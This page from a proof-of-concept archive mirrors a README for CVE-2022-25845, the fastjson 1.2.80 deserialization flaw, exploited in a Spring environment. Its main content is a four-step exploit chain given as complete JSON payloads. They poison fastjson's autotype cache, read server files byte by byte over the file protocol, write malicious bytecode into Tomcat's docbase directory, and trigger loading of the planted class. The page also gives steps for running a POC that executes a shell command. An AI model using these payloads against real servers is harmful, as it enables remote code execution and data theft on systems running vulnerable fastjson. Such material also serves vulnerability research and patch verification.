Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-25845 PoC — Deserialization of Untrusted Data

Source
https://github.com/luelueking/CVE-2022-25845-In-Spring
Associated Vulnerability
Title:Deserialization of Untrusted Data (CVE-2022-25845)
Description:The package com.alibaba:fastjson before 1.2.83 are vulnerable to Deserialization of Untrusted Data by bypassing the default autoType shutdown restrictions, which is possible under certain conditions. Exploiting this vulnerability allows attacking remote servers. Workaround: If upgrading is not possible, you can enable [safeMode](https://github.com/alibaba/fastjson/wiki/fastjson_safemode).
Description
CVE-2022-25845(fastjson1.2.80) exploit in Spring Env!
Readme
# CVE-2022-25845-In-Spring

# 主要依赖
1. jackson
2. commons-io

# 快速复现

1. idea导入项目 build ```mvn install```
2. Dockerfile build && run ```docker build .```
3. 运行src/test/java/POC.java 执行touch /tmp/pwned命令


# 利用说明

## Step1: 把java.io.InputStream 加入 fastjson autotype 缓存

```json
{
  "a": "{    \"@type\": \"java.lang.Exception\",    \"@type\": \"com.fasterxml.jackson.core.exc.InputCoercionException\",    \"p\": {    }  }",
  "b": {
    "$ref": "$.a.a"
  },
  "c": "{  \"@type\": \"com.fasterxml.jackson.core.JsonParser\",  \"@type\": \"com.fasterxml.jackson.core.json.UTF8StreamJsonParser\",  \"in\": {}}",
  "d": {
    "$ref": "$.c.c"
  }
}
```

![截屏2024-11-07 21.36.27](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.36.27.png)

## Step2: file协议读取/tmp内容,获取tomcat的docbase文件名称

> 逐字节读取内容

```json
{
  "a": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.BOMInputStream",
    "delegate": {
      "@type": "org.apache.commons.io.input.BOMInputStream",
      "delegate": {
        "@type": "org.apache.commons.io.input.ReaderInputStream",
        "reader": {
          "@type": "jdk.nashorn.api.scripting.URLReader",
          "url": "${file}"
        },
        "charsetName": "UTF-8",
        "bufferSize": "1024"
      },
      "boms": [
        {
          "charsetName": "UTF-8",
          "bytes": ${data}
        }
      ]
    },
    "boms": [
      {
        "charsetName": "UTF-8",
        "bytes": [1]
      }
    ]
  },
  "b": {"$ref":"$.a.delegate"}
}
```

![截屏2024-11-07 21.35.56](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.56.png)

## Step3: 写入恶意字节码到docbase目录下

```json
{
  "a": {
    "@type": "java.io.InputStream",
    "@type": "org.apache.commons.io.input.AutoCloseInputStream",
    "in": {
      "@type": "org.apache.commons.io.input.TeeInputStream",
      "input": {
        "@type": "org.apache.commons.io.input.CharSequenceInputStream",
        "cs": {
          "@type": "java.lang.String"
          "${shellcode}",
          "charset": "iso-8859-1",
          "bufferSize": ${size}
        },
        "branch": {
          "@type": "org.apache.commons.io.output.WriterOutputStream",
          "writer": {
            "@type": "org.apache.commons.io.output.LockableFileWriter",
            "file": "${file2write}",
            "charset": "iso-8859-1",
            "append": true
          },
          "charset": "iso-8859-1",
          "bufferSize": 1024,
          "writeImmediately": true
        },
        "closeBranch": true
      }
    },
    "b": {
      "@type": "java.io.InputStream",
      "@type": "org.apache.commons.io.input.ReaderInputStream",
      "reader": {
        "@type": "org.apache.commons.io.input.XmlStreamReader",
        "inputStream": {
          "$ref": "$.a"
        },
        "httpContentType": "text/xml",
        "lenient": false,
        "defaultEncoding": "iso-8859-1"
      },
      "charsetName": "iso-8859-1",
      "bufferSize": 1024
    },
    "c": {}
  }
```

![截屏2024-11-07 21.37.04](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.37.04.png)

## Step4: 触发恶意类加载

```json
{
  "@type":"java.lang.Exception",
  "@type":"com.chenzai.HackException"
}
```

![截屏2024-11-07 21.35.32](images/%E6%88%AA%E5%B1%8F2024-11-07%2021.35.32.png)

# 参考/致谢

- [GeekCon 2024](https://www.geekcon.top/js/pdfjs/web/viewer.html?file=/doc/ppt/GC24_SpringBoot之殇.pdf)
- jsjcw
File Snapshot

 [4.0K]  /data/pocs/2941fa39d403266a8b9de7e6359c55745b63dce1
├── [ 143]  Dockerfile
├── [4.0K]  images
│   ├── [646K]  截屏2024-11-07 21.34.52.png
│   ├── [658K]  截屏2024-11-07 21.35.19.png
│   ├── [486K]  截屏2024-11-07 21.35.32.png
│   ├── [382K]  截屏2024-11-07 21.35.56.png
│   ├── [349K]  截屏2024-11-07 21.36.27.png
│   └── [389K]  截屏2024-11-07 21.37.04.png
├── [4.0K]  payloads
│   ├── [ 365]  step1.json
│   ├── [ 695]  step2.json
│   ├── [1.3K]  step3.json
│   └── [  74]  step4.json
├── [1.9K]  pom.xml
├── [3.4K]  README.md
└── [4.0K]  src
    ├── [4.0K]  main
    │   └── [4.0K]  java
    │       └── [4.0K]  org
    │           └── [4.0K]  example
    │               ├── [ 285]  App.java
    │               └── [4.0K]  controller
    │                   └── [ 349]  JSONController.java
    └── [4.0K]  test
        └── [4.0K]  java
            └── [4.8K]  POC.java

10 directories, 16 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →